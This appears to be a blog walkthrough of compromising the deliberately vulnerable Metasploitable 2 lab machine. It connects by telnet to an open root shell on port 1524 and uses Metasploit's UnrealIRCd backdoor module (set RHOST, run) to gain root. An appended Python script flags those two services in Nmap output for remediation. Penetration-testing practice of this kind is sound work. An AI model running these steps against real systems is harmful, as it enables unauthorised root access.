Metasploitable 2 – Compromise: Root Shell

Remember our Nmap results? (https://securityaspirations.com/2017/06/25/metasploitable-2-system-recon/)

One of the entries in there was listed as follows:

1524/tcp  open  shell       Metasploitable root shell

This is probably one of the simplest Metasploitable vulns. There is a root shell open on the box, so let's see if we can connect to it with telnet:

telnet 192.168.168.134 1524

  • telnet <dest_IP> <dest_Port>

Surprisingly, we are connected to the shell without being prompted for credentials.

A quick check with the ‘whoami’ and ‘hostname’ commands confirms we are root and on the Metasploitable box.

Metasploitable 2 – Compromise: UnrealIRC

Let's take a look at this Nmap result in more detail:

6667/tcp  open  irc         UnrealIRCd

Nessus results also show some details here:

Critical (10.0) 46882 UnrealIRCd Backdoor Detection

Worth checking to see if Metasploit has a module we can use here. Fire up Metasploit with:

msfconsole

And let's do a search for any hits on ‘unrealirc’:

search unrealirc


Great, we have a hit. Let's choose this exploit:

use exploit/unix/irc/unreal_ircd_3281_backdoor


We now need to configure it. To see what’s required, use:

show options


Let's set our target (using our Metasploitable IP address) with:

set RHOST 192.168.168.134

Once done you can run ‘show options’ again to confirm it looks good:


Now let's see if it works by typing ‘run’:

run


Be aware that you may not get much feedback even if the exploit is successful.

Try typing ‘hostname’ as above and see what comes back. As you can see, the exploit was successful: we have root access to the Metasploitable box once more.
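
Both findings on this page were sitting in the scan output before anything was exploited. As an added example (not part of the original post), here is a small Python triage script that parses Nmap port-table lines and flags the two services covered above so they can be fixed first. The rule list, function name and sample input are assumptions made for illustration.

```python
import re

# Constructed sample: the two port lines quoted on this page, plus two
# made-up lines (a benign service and a closed port) for contrast.
SAMPLE_NMAP = """\
PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH
23/tcp    closed telnet
1524/tcp  open   shell       Metasploitable root shell
6667/tcp  open   irc         UnrealIRCd
"""

# One row of the Nmap port table: port/proto, state, service, optional version.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Hypothetical triage rules: (severity, pattern on "service version", advice).
RULES = [
    ("critical", re.compile(r"\bbindshell\b|root shell", re.I),
     "listener appears to hand out a shell directly; "
     "find what starts it and remove it"),
    ("high", re.compile(r"unrealircd", re.I),
     "confirm the build is not the backdoored release (Nessus plugin 46882) "
     "and reinstall from a verified source"),
]


def triage(nmap_text):
    """Return (port, proto, severity, advice) for each open port matching a rule."""
    findings = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # table header, blank lines, script output
        port, proto, state, service, version = m.groups()
        if state != "open":
            continue  # closed or filtered ports expose no service
        banner = f"{service} {version}".strip()
        for severity, pattern, advice in RULES:
            if pattern.search(banner):
                findings.append((int(port), proto, severity, advice))
                break  # rules are ordered by severity; first match wins
    return findings


if __name__ == "__main__":
    for port, proto, severity, advice in triage(SAMPLE_NMAP):
        print(f"[{severity}] {port}/{proto}: {advice}")
```
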